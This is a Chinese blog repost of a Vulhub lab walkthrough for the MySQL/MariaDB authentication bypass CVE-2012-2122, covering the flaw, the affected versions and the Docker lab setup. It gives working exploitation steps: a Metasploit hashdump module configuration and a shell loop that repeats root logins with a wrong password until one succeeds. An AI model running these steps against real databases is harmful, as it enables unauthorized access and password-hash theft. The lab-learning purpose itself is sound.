ICode9

精准搜索请尝试: 精确搜索
首页 > 数据库> 文章详细

Vulhub-Mysql 身份认证绕过漏洞(CVE-2012-2122)

2021-07-25 01:00:45  阅读:382  来源: 互联网

标签:Vulhub 5.1 2122 5.5 Mysql 密码 mysql MySQL before


前言

当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。 我们可以使用Meterpreter中的模块或者使用特殊的SQL语句进行身份绕过登录。 影响版本: MySQL 5.1.x before 5.1.63                 5.5.x before 5.5.24,                 5.6.x before 5.6.6,           MariaDB 5.1.x before 5.1.62,                   5.2.x before 5.2.12                   5.3.x before 5.3.6                   5.5.x before 5.5.23

漏洞环境

cd vulhub-master/mysql/CVE-2012-2122 docker-compose up -d

漏洞复现

Method1:使用Meterpreter

msfconsole use auxiliary/scanner/mysql/mysql_authbypass_hashdump set RHOSTS 192.168.10.1 set THREADS 100 run 返回结果如下,可以读取到数据库用户Hash值并保存在账户中 继而对Hash值进行破译,可以得到账户密码

Method2:使用shell语句爆破

 

for i in `seq 1 1000`; do mysql -uroot -pwrong -h 192.168.202.133 -P 3306 ; done

 

  爆破多次即绕过身份验证,成功登录数据库,复现成功

关闭靶场环境

docker-compose down    

标签:Vulhub,5.1,2122,5.5,Mysql,密码,mysql,MySQL,before
来源: https://www.cnblogs.com/culin/p/15056894.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有